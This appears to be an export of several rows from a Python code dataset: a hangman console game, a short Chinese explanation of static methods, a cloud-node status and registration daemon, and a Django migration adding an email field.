from .piecewise_linear import PiecewiseLinear
|
999,396 | d38c6188b0a8f5d0010efae438ac0dbd2c8206cd | import random
import time
print("\n Weilcom to Hangman game\n****@@@****\nCreated by: ABHISHEK SHARMA\n****@@@****")
name=input("Enter your name: \n")
print(f"HELLOW {name} ! BEST OF LUCK!")
time.sleep(2)
print("THE GAME IS GOING TO START \n LET'S PLAY......'")
time.sleep(3)
def main():
global count
global display
global word
global already_guessed
global length
global play_game
words_to_guess=["ABHISHEK","ANSHU","NEHA","RAGHAV","VANSH","TUTION","MRIDUL"]
word=random.choice(words_to_guess)
length=len(word)
count=0
display="_"*length
already_guessed=[]
play_game=""
def play_loop():
global play_game
play_game=input("DO YOU WANT TO PLAY AGAIN ? y=yes,n=no\n")
while play_game not in ["Y","N","y","n"]:
play_game = input("DO YOU WANT TO PLAY AGAIN ? y=yes,n=no\n")
if play_game == "y":
main()
elif play_game == "n":
print(f"THANK YOU PLAYING {name.upper()}! ")
exit()
def hangman():
global count
global display
global word
global already_guessed
global play_game
limit=5
guess=input(f"THIS IS THE HANGMAN WORD: {display} Enter your guess in capital letter:\n")
guess=guess.strip()
if len(guess.strip())==0 or len(guess.strip())>=2 or guess<="9":
print("INVALID INPUT, TRY A LETTER\n")
hangman()
elif guess in word:
already_guessed.extend([guess])
index=word.find(guess)
word=word[:index]+"_"+word[index+1:]
print(display+"\n")
elif guess in already_guessed:
print("TRY ANOTHER LETTER.\n")
else:
count +=1
if count==1:
time.sleep(2)
print(" _______\n"
" | \n"
" | \n"
" | \n"
" | \n"
" | \n"
" | \n"
"___|____ \n")
print("wrong guess."+ str(limit-count) +"guesses remaining \n")
elif count==2:
time.sleep(2)
print(" _____ \n"
" | | \n"
" | |\n"
" | \n"
" | \n"
" | \n"
" | \n"
"__|__\n")
print("Wrong guess. " + str(limit - count) + " guesses remaining\n")
elif count == 3:
time.sleep(1)
print(" _____ \n"
" | | \n"
" | |\n"
" | | \n"
" | \n"
" | \n"
" | \n"
"__|__\n")
print("Wrong guess. " + str(limit - count) + " guesses remaining\n")
elif count == 4:
time.sleep(1)
print(" _____ \n"
" | | \n"
" | | \n"
" | | \n"
" | O \n"
" | \n"
" | \n"
"__|__\n")
print("Wrong guess. " + str(limit - count) + " last guess remaining\n")
elif count == 5:
time.sleep(1)
print(" _____ \n"
" | | \n"
" | |\n"
" | | \n"
" | O \n"
" | /|\ \n"
" | / \ \n"
"__|__\n")
print("Wrong guess. You are hanged!!!\n")
print("The word was:",already_guessed,word)
play_loop()
if word == '_' * length:
print("**********@@@@@@@@@*********\n Congrats! You have guessed the word correctly!\n **********@@@@@@@@*********")
play_loop()
elif count != limit:
hangman()
main()
hangman()
|
999,397 | 433609a55b1e9195dccda64526b7c38de3f29bd6 | #! /usr/bin/python3
# -*- coding:utf8 -*-
'''
问:正常方法和静态方法有何不同?
答:正常方法需要接受第一个self参数,但是静态方法只是嵌套在类对象中的简单函数,不需要传入实例。为了使一个方法成为静态方法,它必须可以通过特殊的内置函数运行,或者使用装饰器进行装饰。Python3.x允许通过类而不需这个步骤就调用类中的简单函数,但通过实例调用时仍需要静态方法声明。
'''
|
999,398 | 5bf7c1115c8533ea89560251bf5eaf3323eeac94 | from luhyaapi.educloudLog import *
from luhyaapi.hostTools import *
from luhyaapi.rabbitmqWrapper import *
from luhyaapi.vboxWrapper import *
from luhyaapi.settings import *
import time, psutil, requests, os, memcache
logger = getncdaemonlogger()
class nc_statusPublisher():
def __init__(self, ):
logger.error("nc_status_publisher start running")
self._ccip = getccipbyconf(mydebug=DAEMON_DEBUG)
self._old_running_vms = []
self._new_running_vms = []
logger.error("cc ip = %s" % self._ccip)
def job5minuts(self):
os.system("chown luhya:luhya /var/log/educloud/*")
try:
node_status = self.collect_node_status()
self.send_node_status_to_cc(node_status)
except Exception as e:
logger.error('nc_statusPublisherThread exception = %s' % str(e))
# find those vms in self._old_running_vms but not in self._new_running_vms
def find_terminated_vms(self):
result = []
for oldvm in self._old_running_vms:
if oldvm not in self._new_running_vms:
result.append(oldvm)
return result
def job30seconds(self):
logger.error("start job30seconds")
vms = os.listdir('/storage/VMs/')
terminated_vms = getNotRunningVMs(vms)
logger.error("terminated vms = %s" % json.dumps(terminated_vms))
mc = memcache.Client(['127.0.0.1:11211'], debug=0)
for tvm in terminated_vms:
is_really_stopped = False
try:
key = "nc_startvm#" + str(tvm)
payload = mc.get(key)
logger.error("retrieve data from memcache as %s - %s" % (key, payload))
if payload == None:
logger.error("find %s is indeed terminated already" % tvm)
is_really_stopped = True
else:
logger.error("find %s is still booting" % tvm)
is_really_stopped = False
except Exception as e:
is_really_stopped = True
if is_really_stopped == True :
message = {}
message['type'] = "cmd"
message['op'] = 'ndp/stop'
message['tid'] = tvm
message['runtime_option'] = ""
_message = json.dumps(message)
zmq_send("127.0.0.1", _message, NC_CMD_QUEUE_PORT)
# every 5 minutes:
# - /var/log/educloud/*.log chown luhya:luhya
# - send node status to cc
# every 30 seconds(if RDP):
# - collect current running vms
# - compare to previous ones
# - send ndp stop message to cc to clc
def run(self):
index = 0
self.job30seconds()
self.job5minuts()
while True:
time.sleep(30)
index += 1
self.job30seconds()
if index == 9:
index = 0
self.job5minuts()
def collect_node_status(self):
payload = { }
payload['type'] = 'nodestatus'
try:
payload['service_data'] = getServiceStatus('nc')
except Exception as e:
logger.error('getServiceStatus exception = %s' % str(e))
try:
payload['hardware_data'] = getHostHardware()
except Exception as e:
logger.error('getHostHardware exception = %s' % str(e))
try:
payload['net_data'] = getHostNetInfo()
except Exception as e:
logger.error('getHostNetInfo exception = %s' % str(e))
try:
payload['vm_data'] = getVMlist()
except Exception as e:
logger.error('getVMlist exception = %s' % str(e))
payload['nid'] = "nc#" + payload['net_data']['mac0'] + "#status"
logger.error("nc_statusPublisher data \n%s" % json.dumps(payload, indent=4))
return payload
def send_node_status_to_cc(self, node_status):
simple_send(logger, self._ccip, 'cc_status_queue', json.dumps(node_status))
def getRuntimeOpiton():
return ''
def registerMyselfasNC():
ccip = getccipbyconf(mydebug=DAEMON_DEBUG)
ccname = getccnamebyconf()
hostname, hostcpus, hostmem, hostdisk = getHostAttr()
netlist = getHostNetInfo()
if isLNC():
if DAEMON_DEBUG == True:
url = 'http://%s:8000/cc/api/1.0/register/lnc' % ccip
else:
url = 'http://%s/cc/api/1.0/register/lnc' % ccip
payload = {
'ip': netlist['ip0'],
'mac': netlist['mac0'],
'name': hostname,
'ccname': ccname,
'location': '',
'hypervisor': getHypervisor(),
'cores': hostcpus,
'memory': hostmem,
'disk': hostdisk,
'runtime_option': getRuntimeOpiton()
}
else:
if DAEMON_DEBUG == True:
url = 'http://%s:8000/cc/api/1.0/register/server' % ccip
else:
url = 'http://%s/cc/api/1.0/register/server' % ccip
payload = {
'role': 'nc',
'name': hostname,
'cores': hostcpus,
'memory': hostmem,
'disk': hostdisk,
'exip': netlist['exip'],
'ip0': netlist['ip0'],
'ip1': netlist['ip1'],
'ip2': netlist['ip2'],
'ip3': netlist['ip3'],
'mac0': netlist['mac0'],
'mac1': netlist['mac1'],
'mac2': netlist['mac2'],
'mac3': netlist['mac3'],
'hypervisor': getHypervisor(),
'ccname': ccname,
}
r = requests.post(url, data=payload)
msg = json.loads(r.content)
if msg['Result'] == "OK":
logger.error("register NC %s succeed !" % netlist['ip0'])
else:
logger.error("register NC %s failed !" % netlist['ip0'])
def main():
# read /storage/config/cc.conf to register itself to cc
registerMyselfasNC()
publisher = nc_statusPublisher()
publisher.run()
if __name__ == '__main__':
main()
|
999,399 | 9c00a77c36b92ebe4f6383f5f62f4b834b5780f8 | # Generated by Django 3.1.2 on 2021-07-31 04:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('recommapp', '0009_auto_20210730_2320'),
]
operations = [
migrations.AddField(
model_name='review',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True),
),
migrations.AlterField(
model_name='review',
name='comment',
field=models.CharField(max_length=200),
),
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.